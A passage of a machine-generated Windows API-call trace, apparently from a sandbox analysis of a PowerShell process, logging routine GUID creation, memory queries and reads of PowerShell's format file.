[7]=0x7c))) returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xa21b5569, Data2=0x6d8, Data3=0x469d, Data4=([0]=0x86, [1]=0x88, [2]=0x4b, [3]=0xc9, [4]=0xe1, [5]=0x76, [6]=0xae, [7]=0xea))) returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x48388b62, Data2=0xaa64, Data3=0x4057, Data4=([0]=0x93, [1]=0x6, [2]=0xc4, [3]=0x6c, [4]=0xb8, [5]=0xc7, [6]=0x8f, [7]=0xdd))) returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.906] GetLastError () returned 0x0 [0026.907] GetLastError () returned 0x0 [0026.907] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xaad3241c, Data2=0xd3fe, Data3=0x44ea, Data4=([0]=0x9b, [1]=0xe, [2]=0xfa, [3]=0x1, [4]=0xbe, [5]=0x83, [6]=0xca, [7]=0xfb))) returned 0x0 [0026.907] GetLastError () returned 0x0 [0026.907] GetLastError () returned 0x0 [0026.907] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xb05db33b, Data2=0xb977, Data3=0x4bf5, Data4=([0]=0x91, [1]=0x2f, [2]=0xa1, [3]=0xc0, [4]=0x1a, [5]=0x3f, [6]=0x97, [7]=0xb1))) returned 0x0 [0026.907] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1b49c912, Data2=0x812e, Data3=0x46fd, Data4=([0]=0x86, [1]=0xb1, [2]=0xf5, [3]=0x65, [4]=0x81, [5]=0x89, [6]=0x7d, [7]=0xa0))) returned 0x0 [0026.907] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2fe325f7, Data2=0x8f7c, Data3=0x4a3d, Data4=([0]=0x90, [1]=0x77, [2]=0x65, [3]=0xd4, [4]=0x70, [5]=0x54, [6]=0xf0, [7]=0x31))) returned 0x0 [0026.908] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xab4c50d9, Data2=0x7339, Data3=0x4655, Data4=([0]=0x89, [1]=0xb5, [2]=0x54, [3]=0xc, [4]=0x36, [5]=0xa0, [6]=0x84, [7]=0x2a))) returned 0x0 [0026.908] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.908] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.908] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.908] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.909] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.909] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.909] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.910] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.910] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.910] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.910] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.910] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.911] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.911] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.911] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.912] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.912] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.912] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.912] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.912] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.912] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xbcc348e0, Data2=0xfdea, Data3=0x4f82, Data4=([0]=0xa5, [1]=0xce, [2]=0xd4, [3]=0x30, [4]=0x96, [5]=0x15, [6]=0x55, [7]=0xd7))) returned 0x0 [0026.913] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.913] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.913] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.913] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.913] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.914] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.914] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.914] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.914] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.915] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.915] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.915] VirtualQuery (in: lpAddress=0x1cd054, lpBuffer=0x1ce054, dwLength=0x1c | out: lpBuffer=0x1ce054*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.915] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.915] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.916] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.916] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.916] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.916] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.916] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.917] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.917] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xde50cc91, Data2=0x8846, Data3=0x4dce, Data4=([0]=0x96, [1]=0x56, [2]=0x0, [3]=0x64, [4]=0xdf, [5]=0xcd, [6]=0x8d, [7]=0x15))) returned 0x0 [0026.917] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.917] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.917] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.918] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.919] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.919] VirtualQuery (in: lpAddress=0x1ccecc, lpBuffer=0x1cdecc, dwLength=0x1c | out: lpBuffer=0x1cdecc*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.919] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.919] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.919] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.920] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.920] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x3046a491, Data2=0xd0d3, Data3=0x47d7, Data4=([0]=0x81, [1]=0xad, [2]=0x60, [3]=0x56, [4]=0x32, [5]=0xfe, [6]=0xc6, [7]=0x72))) returned 0x0 [0026.920] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x212989e3, Data2=0x5c38, Data3=0x4ee4, Data4=([0]=0x82, [1]=0xc3, [2]=0x85, [3]=0xa, [4]=0x5c, [5]=0xa9, [6]=0x2e, [7]=0xb9))) returned 0x0 [0026.920] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xbdfb7663, Data2=0x1add, Data3=0x4c4b, Data4=([0]=0xb8, [1]=0x11, [2]=0xe1, [3]=0x70, [4]=0xa7, [5]=0x8, [6]=0xba, [7]=0x32))) returned 0x0 [0026.920] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xc245298c, Data2=0xe0eb, Data3=0x4e95, Data4=([0]=0x90, [1]=0xe2, [2]=0xdf, [3]=0x88, [4]=0x92, [5]=0x88, [6]=0xdc, [7]=0xab))) returned 0x0 [0026.921] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xbaef8082, Data2=0x826f, Data3=0x4bf9, Data4=([0]=0x91, [1]=0x6f, [2]=0x7f, [3]=0xaa, [4]=0x67, [5]=0x4e, [6]=0xbd, [7]=0xb3))) returned 0x0 [0026.921] VirtualQuery (in: lpAddress=0x1ccf5c, lpBuffer=0x1cdf5c, dwLength=0x1c | out: lpBuffer=0x1cdf5c*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.921] VirtualQuery (in: lpAddress=0x1ccf98, lpBuffer=0x1cdf98, dwLength=0x1c | out: lpBuffer=0x1cdf98*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.921] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x8e06ab70, Data2=0x4b69, Data3=0x40bd, Data4=([0]=0xb8, [1]=0xbd, [2]=0x12, [3]=0x4e, [4]=0x6d, [5]=0xf0, [6]=0xaa, [7]=0x95))) returned 0x0 [0026.922] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x685e19b, Data2=0x8463, Data3=0x4215, Data4=([0]=0x9f, [1]=0xce, [2]=0x4d, [3]=0xa9, [4]=0x95, [5]=0x67, [6]=0xd6, [7]=0x6b))) returned 0x0 [0026.922] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xf1fe844e, Data2=0x9b4f, Data3=0x44b2, Data4=([0]=0xa7, [1]=0x4b, [2]=0x98, [3]=0x4d, [4]=0xbb, [5]=0x52, [6]=0xf0, [7]=0x55))) returned 0x0 [0026.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0026.922] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.922] GetLastError () returned 0x0 [0026.922] GetFileType (hFile=0x2f8) returned 0x1 [0026.922] SetErrorMode (uMode=0x1) returned 0x1 [0026.922] GetFileType (hFile=0x2f8) returned 0x1 [0026.922] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.924] GetLastError () returned 0x0 [0026.925] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.925] GetLastError () returned 0x0 [0026.925] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.925] GetLastError () returned 0x0 [0026.925] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.925] GetLastError () returned 0x0 [0026.925] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.925] GetLastError () returned 0x0 [0026.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.926] GetLastError () returned 0x0 [0026.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.926] GetLastError () returned 0x0 [0026.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.926] GetLastError () returned 0x0 [0026.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.926] GetLastError () returned 0x0 [0026.927] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.927] GetLastError () returned 0x0 [0026.927] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.927] GetLastError () returned 0x0 [0026.928] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.928] GetLastError () returned 0x0 [0026.928] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.928] GetLastError () returned 0x0 [0026.928] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.928] GetLastError () returned 0x0 [0026.928] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.928] GetLastError () returned 0x0 